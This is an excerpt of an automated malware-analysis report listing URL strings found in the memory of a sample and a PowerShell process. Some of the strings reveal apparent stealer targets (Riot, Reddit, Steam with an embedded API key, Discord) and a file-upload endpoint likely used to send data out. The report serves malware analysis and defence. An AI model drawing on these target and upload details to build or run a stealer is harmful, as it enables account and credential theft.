            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444064609.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/post
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440363772.0000018B45190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
            Source: powershell.exe, 00000051.00000002.2334646014.00000260D11EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2334646014.00000260D1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2436331270.0000018B472F6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441263044.0000018B472F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://python.org/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org:80
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C28E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2339941788.00000260D93F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434897742.0000018B47394000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2139724207.0000018B4738F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441672563.0000018B47395000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0.0.1:8443
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_token
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/0j9H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454825824.00007FFD9DEB1000.00000040.00000001.01000000.00000020.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io
            Source: METADATA0.0.drString found in binary or memory: https://cryptography.io/
